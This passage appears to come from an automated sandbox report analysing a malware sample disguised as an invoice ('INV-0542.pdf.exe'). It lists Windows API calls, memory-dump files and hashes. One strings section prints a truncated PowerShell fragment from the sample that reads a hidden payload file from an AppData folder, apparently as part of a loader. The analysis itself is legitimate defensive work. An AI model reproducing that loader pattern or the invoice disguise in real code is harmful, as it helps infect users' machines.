                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040643C,?,?,?,?,: Completed,?,00000000), ref: 004063D2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Open
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                • Instruction ID: 160c38975f312424f4866d14917befa5dd24af40cdf73f4d33e28196d90f96f9
                                                                                                                                                                • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                • Instruction Fuzzy Hash: 44D0123204020EBBDF115E90ED01FAB3B1DAB08350F014426FE06E40A0D775D534A754
                                                                                                                                                                APIs
                                                                                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: 505856000b56d662a9aa875b3a3f8f40bf86435686472c5d4cf907b3c1585cba
                                                                                                                                                                • Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
                                                                                                                                                                • Opcode Fuzzy Hash: 505856000b56d662a9aa875b3a3f8f40bf86435686472c5d4cf907b3c1585cba
                                                                                                                                                                • Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                                                                                                • Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
                                                                                                                                                                • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                                                                                                • Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D
                                                                                                                                                                APIs
                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00405B76
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExecuteShell
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 587946157-0
                                                                                                                                                                • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                                                                                                                                • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                                                                                                                                • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                                                                                                                                • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                                                                                                                                APIs
                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                                                • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                                                                                                • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                                                                                                                                • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                                                                                                • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                                                                                                                                APIs
                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                                                                                                • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                                                                                                                • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                                                                                                • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004055C6: lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                                                                                                                  • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                                                                                                                  • Part of subcall function 004055C6: lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
                                                                                                                                                                  • Part of subcall function 004055C6: SetWindowTextW.USER32(matrices,matrices), ref: 00405633
                                                                                                                                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                                                                                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                                                                                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                                                                                                                  • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                                                                                                                  • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                                                  • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
                                                                                                                                                                  • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
                                                                                                                                                                  • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2972824698-0
                                                                                                                                                                • Opcode ID: 6661bbc6a6cbc62f2ae8f9ac3ffc578f0765c459b67b1fe30ee97d11a41af7f8
                                                                                                                                                                • Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
                                                                                                                                                                • Opcode Fuzzy Hash: 6661bbc6a6cbc62f2ae8f9ac3ffc578f0765c459b67b1fe30ee97d11a41af7f8
                                                                                                                                                                • Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                                                                                                                                • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
                                                                                                                                                                • lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                                                                                                                                  • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                                                                                                                                                  • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\INV-0542.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                                                                                                                  • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                                                                                                                  • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\INV-0542.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                                                                                                                  • Part of subcall function 004067EF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                                                                                                                                  • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                                                                                                                  • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                                                                                                                                  • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                                                                                                                Strings
                                                                                                                                                                • : Completed, xrefs: 00404B12, 00404B17, 00404B22
                                                                                                                                                                • C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 00404B01
                                                                                                                                                                • A, xrefs: 00404AD4
                                                                                                                                                                • "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkk, xrefs: 004049CA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                • String ID: "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkk$: Completed$A$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis
                                                                                                                                                                • API String ID: 2624150263-4288981242
                                                                                                                                                                • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                                                                                                                • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                                                                                                                                                • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                                                                                                                • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                                                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00405027
                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                                                                                                                                  • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00405189
                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 00405357
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405367
                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00405511
                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00405523
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                • String ID: $M$N
                                                                                                                                                                • API String ID: 2564846305-813528018
                                                                                                                                                                • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                                                                                                                • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
